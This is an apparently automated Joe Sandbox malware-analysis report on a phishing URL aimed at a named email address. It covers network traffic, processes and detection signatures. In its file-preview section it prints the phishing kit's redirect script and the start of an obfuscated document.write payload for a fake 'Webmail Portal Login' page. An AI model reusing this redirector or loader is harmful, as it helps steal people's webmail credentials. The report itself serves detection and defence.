Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://bowhandmade.pt/.jan2#fritss@boogertmanpta.co.za

Overview

General Information

Sample URL:https://bowhandmade.pt/.jan2#fritss@boogertmanpta.co.za
Analysis ID:1587473
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected suspicious Javascript
HTML page contains obfuscated javascript
Detected non-DNS traffic on DNS port
URL contains potential PII (phishing indication)

Classification

  • System is w10x64
  • chrome.exe (PID: 2932 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 3568 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1976,i,854267468410415921,12782288246673492753,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6492 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://bowhandmade.pt/.jan2#fritss@boogertmanpta.co.za" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://bowhandmade.pt/.jan2/#fritss@boogertmanpta... This script demonstrates high-risk behavior by redirecting the user to an untrusted domain (https://pub-093df4ea445740f9b5bda34d3a4b96a1.r2.dev/oblee.html) with potentially malicious intent. The use of `window.location.replace()` to perform the redirect, along with the obfuscation of the final URL, are strong indicators of suspicious activity.
Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://pub-093df4ea445740f9b5bda34d3a4b96a1.r2.de... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code. The use of `document.write()` to execute the decoded content is a clear indicator of potential malicious intent. Additionally, the script appears to be attempting to bypass security measures like robots.txt and Google bot detection. While the final intent is unclear, the combination of these factors suggests a high-risk scenario that requires further investigation.
Source: https://pub-093df4ea445740f9b5bda34d3a4b96a1.r2.dev/oblee.html#fritss@boogertmanpta.co.zaHTTP Parser: <!-- code by https://www.html-code-generator.com -->document.write(unescape('%3C%21%44%4F%43%54%59
Source: https://bowhandmade.pt/.jan2#fritss@boogertmanpta.co.zaSample URL: PII: fritss@boogertmanpta.co.za
Source: global trafficTCP traffic: 192.168.2.4:55160 -> 162.159.36.2:53
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /.jan2 HTTP/1.1Host: bowhandmade.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /.jan2/ HTTP/1.1Host: bowhandmade.ptConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /oblee.html HTTP/1.1Host: pub-093df4ea445740f9b5bda34d3a4b96a1.r2.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://bowhandmade.pt/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: bowhandmade.pt
Source: global trafficDNS traffic detected: DNS query: pub-093df4ea445740f9b5bda34d3a4b96a1.r2.dev
Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
Source: chromecache_43.2.drString found in binary or memory: https://pub-093df4ea445740f9b5bda34d3a4b96a1.r2.dev/oblee.html
Source: chromecache_44.2.drString found in binary or memory: https://www.html-code-generator.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55256
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55256 -> 443
Source: classification engineClassification label: mal48.phis.win@17/4@9/7
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1976,i,854267468410415921,12782288246673492753,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://bowhandmade.pt/.jan2#fritss@boogertmanpta.co.za"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1976,i,854267468410415921,12782288246673492753,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://bowhandmade.pt/.jan2#fritss@boogertmanpta.co.za0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://www.html-code-generator.com0%Avira URL Cloudsafe
https://bowhandmade.pt/.jan20%Avira URL Cloudsafe
https://bowhandmade.pt/.jan2/0%Avira URL Cloudsafe
https://pub-093df4ea445740f9b5bda34d3a4b96a1.r2.dev/oblee.html0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
bowhandmade.pt
109.71.40.47
truetrue
    unknown
    pub-093df4ea445740f9b5bda34d3a4b96a1.r2.dev
    172.66.0.235
    truetrue
      unknown
      www.google.com
      172.217.16.196
      truefalse
        high
        198.187.3.20.in-addr.arpa
        unknown
        unknownfalse
          high
          NameMaliciousAntivirus DetectionReputation
          https://pub-093df4ea445740f9b5bda34d3a4b96a1.r2.dev/oblee.htmltrue
          • Avira URL Cloud: safe
          unknown
          https://bowhandmade.pt/.jan2/true
          • Avira URL Cloud: safe
          unknown
          https://bowhandmade.pt/.jan2true
          • Avira URL Cloud: safe
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://www.html-code-generator.comchromecache_44.2.drtrue
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          239.255.255.250
          unknownReserved
          unknownunknownfalse
          216.58.212.132
          unknownUnited States
          15169GOOGLEUSfalse
          109.71.40.47
          bowhandmade.ptPortugal
          24768ALMOUROLTECPTtrue
          172.66.0.235
          pub-093df4ea445740f9b5bda34d3a4b96a1.r2.devUnited States
          13335CLOUDFLARENETUStrue
          172.217.16.196
          www.google.comUnited States
          15169GOOGLEUSfalse
          IP
          192.168.2.16
          192.168.2.4
          Joe Sandbox version:42.0.0 Malachite
          Analysis ID:1587473
          Start date and time:2025-01-10 12:21:04 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 2m 58s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:browseurl.jbs
          Sample URL:https://bowhandmade.pt/.jan2#fritss@boogertmanpta.co.za
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:8
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal48.phis.win@17/4@9/7
          EGA Information:Failed
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
          • Excluded IPs from analysis (whitelisted): 142.250.186.131, 142.250.185.142, 74.125.71.84, 172.217.16.206, 142.250.185.174, 199.232.210.172, 192.229.221.95, 216.58.206.78, 142.250.185.206, 142.250.186.174, 216.58.206.35, 184.28.90.27, 4.245.163.56, 20.3.187.198, 52.149.20.212, 13.107.253.45
          • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
          • Not all processes where analyzed, report is missing behavior information
          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          • VT rate limit hit for: https://bowhandmade.pt/.jan2#fritss@boogertmanpta.co.za
          No simulations
          No context
          No context
          No context
          No context
          No context
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:HTML document, ASCII text, with very long lines (313), with no line terminators
          Category:downloaded
          Size (bytes):313
          Entropy (8bit):5.038982721972653
          Encrypted:false
          SSDEEP:6:gLoNmeUmWBK0K0AhDLWFe4eGzkcrgZAvVfIBhxZu0Ab:gENpUhBxBsWHjrgZAvVfIBhryb
          MD5:490E4892DD3613B07D6790496497F644
          SHA1:E2D66C31FE45CCEBE4FC0D270785844651605EB3
          SHA-256:8F7C62EEA59BDA40F5FD4B27496E8F47C04D1BF40DA6A05C79A9A4F3EF8684BA
          SHA-512:D17D4D93275F1FB6949851352D3438138A8E0CACB49FF55F3870F0B7090F5645E6834671F9012FA6F79FD7C814B22ECAE9C85535E41A6688380902B04B844B9E
          Malicious:false
          Reputation:low
          URL:https://bowhandmade.pt/.jan2/
          Preview:<script>const web_url = window.location.href;const test1 = `${window.location.protocol}//${window.location.hostname}${window.location.pathname}`;const clean_url = web_url.replaceAll(test1.toString(),"");window.location.replace("https://pub-093df4ea445740f9b5bda34d3a4b96a1.r2.dev/oblee.html"+clean_url);</script>
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:HTML document, ASCII text, with very long lines (65435), with CRLF line terminators
          Category:downloaded
          Size (bytes):286720
          Entropy (8bit):3.3243873539377184
          Encrypted:false
          SSDEEP:1536:GRv1fBggsG1b3dyqxImgK7iNsNlr0x0Gd8S4JFJVAT1TXzCYPoJKc2dxXAU/5LzI:m
          MD5:F8799203A95B20D347AA09AC50A7EEE1
          SHA1:7C652C420B9FA94D191BCA18DFFBCE2BA8E9906D
          SHA-256:DFE8F2199F81135409522185D96279201B8C3782A4895CDFEA98A8B593353882
          SHA-512:729CF355D282133989BCC58723771A83B1AF8DEBEBBB601162719B1F81FBA2440DC94BAB92EB9216BB32C767FEE5261362EFF7E1EA311645F28E735C1926020E
          Malicious:false
          Reputation:low
          URL:https://pub-093df4ea445740f9b5bda34d3a4b96a1.r2.dev/oblee.html
          Preview:<script nonce="MTg5NjYwMTM5NiwyODY3NzY4NjI1">.. code by https://www.html-code-generator.com -->..document.write(unescape('%3C%21%44%4F%43%54%59%50%45%20%68%74%6D%6C%3E%0A%3C%68%74%6D%6C%3E%0A%0A%3C%68%65%61%64%3E%0A%20%20%20%20%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2D%54%79%70%65%22%20%63%6F%6E%74%65%6E%74%3D%22%74%65%78%74%2F%68%74%6D%6C%3B%20%63%68%61%72%73%65%74%3D%77%69%6E%64%6F%77%73%2D%31%32%35%32%22%3E%0A%20%20%20%20%3C%6D%65%74%61%20%6E%61%6D%65%3D%22%72%6F%62%6F%74%73%22%20%63%6F%6E%74%65%6E%74%3D%22%6E%6F%69%6E%64%65%78%2C%20%6E%6F%66%6F%6C%6C%6F%77%22%3E%0A%20%20%20%20%3C%6D%65%74%61%20%6E%61%6D%65%3D%22%67%6F%6F%67%6C%65%62%6F%74%22%20%63%6F%6E%74%65%6E%74%3D%22%6E%6F%69%6E%64%65%78%2C%20%6E%6F%66%6F%6C%6C%6F%77%22%3E%0A%20%20%20%20%3C%74%69%74%6C%65%3E%57%65%62%6D%61%69%6C%20%50%6F%72%74%61%6C%20%4C%6F%67%69%6E%3C%2F%74%69%74%6C%65%3E%0A%0A%20%20%20%20%3C%73%74%79%6C%65%3E%68%74%6D%6C%2C%62%6F%64%79%2C%64%69%76%2C%73%70%61%6E%2C%61%
          No static file info
          TimestampSource PortDest PortSource IPDest IP
          Jan 10, 2025 12:22:01.915719986 CET49675443192.168.2.4173.222.162.32
          Jan 10, 2025 12:22:08.271120071 CET49738443192.168.2.4172.217.16.196
          Jan 10, 2025 12:22:08.271145105 CET44349738172.217.16.196192.168.2.4
          Jan 10, 2025 12:22:08.271224022 CET49738443192.168.2.4172.217.16.196
          Jan 10, 2025 12:22:08.271393061 CET49738443192.168.2.4172.217.16.196
          Jan 10, 2025 12:22:08.271409035 CET44349738172.217.16.196192.168.2.4
          Jan 10, 2025 12:22:08.936182022 CET44349738172.217.16.196192.168.2.4
          Jan 10, 2025 12:22:08.936768055 CET49738443192.168.2.4172.217.16.196
          Jan 10, 2025 12:22:08.936799049 CET44349738172.217.16.196192.168.2.4
          Jan 10, 2025 12:22:08.938438892 CET44349738172.217.16.196192.168.2.4
          Jan 10, 2025 12:22:08.938545942 CET49738443192.168.2.4172.217.16.196
          Jan 10, 2025 12:22:08.939870119 CET49738443192.168.2.4172.217.16.196
          Jan 10, 2025 12:22:08.939955950 CET44349738172.217.16.196192.168.2.4
          Jan 10, 2025 12:22:08.980176926 CET49738443192.168.2.4172.217.16.196
          Jan 10, 2025 12:22:08.980209112 CET44349738172.217.16.196192.168.2.4
          Jan 10, 2025 12:22:09.026985884 CET49738443192.168.2.4172.217.16.196
          Jan 10, 2025 12:22:09.383905888 CET49740443192.168.2.4109.71.40.47
          Jan 10, 2025 12:22:09.383997917 CET44349740109.71.40.47192.168.2.4
          Jan 10, 2025 12:22:09.384113073 CET49740443192.168.2.4109.71.40.47
          Jan 10, 2025 12:22:09.384407043 CET49741443192.168.2.4109.71.40.47
          Jan 10, 2025 12:22:09.384462118 CET44349741109.71.40.47192.168.2.4
          Jan 10, 2025 12:22:09.384536982 CET49741443192.168.2.4109.71.40.47
          Jan 10, 2025 12:22:09.384663105 CET49740443192.168.2.4109.71.40.47
          Jan 10, 2025 12:22:09.384692907 CET44349740109.71.40.47192.168.2.4
          Jan 10, 2025 12:22:09.385020018 CET49741443192.168.2.4109.71.40.47
          Jan 10, 2025 12:22:09.385060072 CET44349741109.71.40.47192.168.2.4
          Jan 10, 2025 12:22:10.245162964 CET44349740109.71.40.47192.168.2.4
          Jan 10, 2025 12:22:10.245582104 CET49740443192.168.2.4109.71.40.47
          Jan 10, 2025 12:22:10.245611906 CET44349740109.71.40.47192.168.2.4
          Jan 10, 2025 12:22:10.247265100 CET44349740109.71.40.47192.168.2.4
          Jan 10, 2025 12:22:10.247344971 CET49740443192.168.2.4109.71.40.47
          Jan 10, 2025 12:22:10.249142885 CET44349741109.71.40.47192.168.2.4
          Jan 10, 2025 12:22:10.249672890 CET49741443192.168.2.4109.71.40.47
          Jan 10, 2025 12:22:10.249742985 CET44349741109.71.40.47192.168.2.4
          Jan 10, 2025 12:22:10.252250910 CET49740443192.168.2.4109.71.40.47
          Jan 10, 2025 12:22:10.252347946 CET44349740109.71.40.47192.168.2.4
          Jan 10, 2025 12:22:10.252476931 CET49740443192.168.2.4109.71.40.47
          Jan 10, 2025 12:22:10.253361940 CET44349741109.71.40.47192.168.2.4
          Jan 10, 2025 12:22:10.253441095 CET49741443192.168.2.4109.71.40.47
          Jan 10, 2025 12:22:10.253704071 CET49741443192.168.2.4109.71.40.47
          Jan 10, 2025 12:22:10.253885031 CET44349741109.71.40.47192.168.2.4
          Jan 10, 2025 12:22:10.295360088 CET44349740109.71.40.47192.168.2.4
          Jan 10, 2025 12:22:10.307168961 CET49740443192.168.2.4109.71.40.47
          Jan 10, 2025 12:22:10.307189941 CET44349740109.71.40.47192.168.2.4
          Jan 10, 2025 12:22:10.307276964 CET49741443192.168.2.4109.71.40.47
          Jan 10, 2025 12:22:10.307341099 CET44349741109.71.40.47192.168.2.4
          Jan 10, 2025 12:22:10.353857994 CET49741443192.168.2.4109.71.40.47
          Jan 10, 2025 12:22:10.353948116 CET49740443192.168.2.4109.71.40.47
          Jan 10, 2025 12:22:10.966888905 CET44349740109.71.40.47192.168.2.4
          Jan 10, 2025 12:22:10.966993093 CET44349740109.71.40.47192.168.2.4
          Jan 10, 2025 12:22:10.967070103 CET49740443192.168.2.4109.71.40.47
          Jan 10, 2025 12:22:10.967253923 CET49740443192.168.2.4109.71.40.47
          Jan 10, 2025 12:22:10.967278004 CET44349740109.71.40.47192.168.2.4
          Jan 10, 2025 12:22:10.967288971 CET49740443192.168.2.4109.71.40.47
          Jan 10, 2025 12:22:10.967348099 CET49740443192.168.2.4109.71.40.47
          Jan 10, 2025 12:22:10.969095945 CET49741443192.168.2.4109.71.40.47
          Jan 10, 2025 12:22:11.011343002 CET44349741109.71.40.47192.168.2.4
          Jan 10, 2025 12:22:11.488023043 CET44349741109.71.40.47192.168.2.4
          Jan 10, 2025 12:22:11.488223076 CET44349741109.71.40.47192.168.2.4
          Jan 10, 2025 12:22:11.488738060 CET49741443192.168.2.4109.71.40.47
          Jan 10, 2025 12:22:11.571676970 CET49741443192.168.2.4109.71.40.47
          Jan 10, 2025 12:22:11.571738958 CET44349741109.71.40.47192.168.2.4
          Jan 10, 2025 12:22:11.612534046 CET49743443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:11.612617016 CET44349743172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:11.612863064 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:11.612890959 CET49743443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:11.612956047 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:11.613044024 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:11.613234997 CET49743443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:11.613257885 CET44349743172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:11.613384962 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:11.613420963 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.074649096 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.074949980 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.075000048 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.076473951 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.076543093 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.077558041 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.077646017 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.077820063 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.077836037 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.090629101 CET44349743172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.090859890 CET49743443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.090892076 CET44349743172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.094475031 CET44349743172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.094542980 CET49743443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.094927073 CET49743443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.095102072 CET44349743172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.119879961 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.136028051 CET49743443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.136073112 CET44349743172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.183259010 CET49743443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.346874952 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.346932888 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.346996069 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.347059011 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.347069025 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.347099066 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.347115040 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.347119093 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.350974083 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.351815939 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.351911068 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.351937056 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.351984978 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.352015972 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.354788065 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.433538914 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.433710098 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.433804035 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.433892965 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.433968067 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.433976889 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.434042931 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.434092999 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.434139967 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.434192896 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.434209108 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.434274912 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.434385061 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.434566975 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.434626102 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.434638977 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.435033083 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.435108900 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.435122013 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.435201883 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.435257912 CET49744443192.168.2.4172.66.0.235
          Jan 10, 2025 12:22:12.435270071 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.435399055 CET44349744172.66.0.235192.168.2.4
          Jan 10, 2025 12:22:12.435525894 CET44349744172.66.0.235192.168.2.4
